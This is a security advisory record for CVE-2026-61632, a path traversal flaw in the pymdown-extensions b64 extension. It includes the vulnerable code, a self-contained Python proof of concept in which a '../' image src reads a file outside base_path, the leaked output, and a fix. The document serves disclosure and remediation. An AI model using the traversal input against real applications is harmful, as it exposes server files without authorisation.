{"id":"CVE-2026-61632","aliases":["GHSA-9xwg-3r6f-jcx2","PYSEC-2026-3609"],"title":"PyMdown Extensions: Path traversal in the b64 extension lets <img src> read files outside base_path","summary":"PyMdown Extensions: Path traversal in the b64 extension lets <img src> read files outside base_path","severity":"medium","cvss":5.3,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","vendor":"pymdown-extensions","product":"pymdown-extensions","ecosystem":"pip","affected":["pymdown-extensions < 11.0.0"],"patched":["pymdown-extensions 11.0.0"],"published":"2026-07-24","updated":"2026-09-10","sourceUpdated":"2026-09-10T03:51:11.365684709Z","source":"OSV","sourceUrl":"https://osv.dev/vulnerability/GHSA-9xwg-3r6f-jcx2","references":[{"url":"https://github.com/facelessuser/pymdown-extensions/security/advisories/GHSA-9xwg-3r6f-jcx2"},{"url":"https://github.com/facelessuser/pymdown-extensions/commit/edce35586d11a1ef78bb187bc60497fe6dbf3b64"},{"url":"https://github.com/facelessuser/pymdown-extensions"},{"url":"https://github.com/facelessuser/pymdown-extensions/releases/tag/11.0"},{"url":"https://github.com/advisories/GHSA-9xwg-3r6f-jcx2"}],"tags":["osv","pip","nvd","ghsa"],"epss":0.00418,"epssPercentile":0.35753,"cwe":["CWE-22"],"ingestedAt":"2026-07-24T16:33:09.492Z","slug":"CVE-2026-61632","body":"## Overview\n\n### Summary\n\nThe `b64` extension inlines images referenced by `<img src=\"...\">` as base64 data URIs. When resolving the `src` path it joins it onto the configured `base_path` with `os.path.normpath` and opens the result directly, with no check that the resolved path stays inside `base_path`. A `src` containing `../` sequences, or an absolute path, therefore reads a file outside `base_path` as long as that file has an allowed image extension (`.png`, `.jpg`, `.jpeg`, `.gif`, `.svg`). The base64 of that file is then embedded in the rendered output, disclosing its contents.\n\nThis is a separate code path from the `snippets` traversal issues (GHSA-jh85-wwv9-24hv, GHSA-62q4-447f-wv8h). It lives in `pymdownx/b64.py` and has no path restriction of any kind. Confirmed on `10.21.3` installed from PyPI.\n\n### Details\n\nIn `pymdownx/b64.py`, function `repl_path` (around lines 68 to 90 on `main`):\n\n```python\nif is_absolute:\n    file_name = os.path.normpath(path)                          # absolute src: base_path ignored entirely\nelse:\n    file_name = os.path.normpath(os.path.join(base_path, path)) # relative src: '../' escapes base_path\nif os.path.exists(file_name):\n    ext = os.path.splitext(file_name)[1].lower()\n    for b64_ext in file_types:\n        if ext in b64_ext:\n            with open(file_name, \"rb\") as f:                    # opened with no containment check\n                ...\n```\n\nThere is no `startswith(base_path)`, no `os.path.realpath` comparison, and no rejection of `..`. Both branches are reachable from an attacker-controlled `src`.\n\n### PoC\n\nReproduced against an unmodified `pymdown-extensions==10.21.3` from PyPI. The script creates a `base_path` directory and a PNG one level above it, then renders Markdown whose image `src` points outside `base_path`, and confirms the outside file's bytes appear base64-encoded in the output.\n\n```python\nimport base64, os, shutil, tempfile, markdown\n\nroot = tempfile.mkdtemp()\nbase_path = os.path.join(root, \"docs\"); os.makedirs(base_path)\noutside = os.path.join(root, \"secret\"); os.makedirs(outside)\n\npng = base64.b64decode(\n    \"iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNk\"\n    \"+M9QDwADhgGAWjR9awAAAABJRU5ErkJggg==\"\n)\nwith open(os.path.join(outside, \"secret.png\"), \"wb\") as f:\n    f.write(png)\n\nmd = markdown.Markdown(\n    extensions=[\"pymdownx.b64\"],\n    extension_configs={\"pymdownx.b64\": {\"base_path\": base_path}},\n)\nhtml = md.convert('<img src=\"../secret/secret.png\">')\n\nassert base64.b64encode(png).decode() in html, \"not leaked\"\nprint(\"LEAKED:\", html)\n```\n\nOutput:\n\n```\nLEAKED: <p><img src=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQ...\"></p>\n```\n\nThe base64 of a file outside `base_path` is present in the output. The absolute-path branch behaves the same way: an absolute `src` bypasses `base_path` entirely via `os.path.normpath(path)`. Both were confirmed leaking.\n\n### Impact\n\nAn application that renders untrusted Markdown with `pymdownx.b64` enabled exposes the contents of image-extension files on the server, or any path the process can read, to whoever controls the Markdown and whoever views the output. The reach is bounded by the image-extension check, so it is a targeted file read rather than full arbitrary read, but it still discloses file contents that were never meant to be exposed.\n\n### Suggested fix\n\nResolve the real path and require it to stay within `base_path` before opening:\n\n```python\nfile_name = os.path.realpath(os.path.join(base_path, path))\nbase_real = os.path.realpath(base_path)\nif file_name != base_real and not file_name.startswith(base_real + os.sep):\n    return m.group(0)  # leave the tag untouched; do not read outside base_path\n```\n\nThe same containment check should apply to the absolute-path branch rather than trusting an absolute `src`. Using `realpath` instead of `abspath` also closes the related symlink-following gap in the snippets handler.\n\n## Affected packages\n\n- `pymdown-extensions < 11.0.0`\n\n## Remediation\n\nUpgrade to a patched release:\n\n- `pymdown-extensions 11.0.0`","depth":"sunlit","depthScore":29,"depthScoreParts":{"impact":29.2,"likelihood":0.1,"exploitation":0,"ransomware":0},"changes":[]}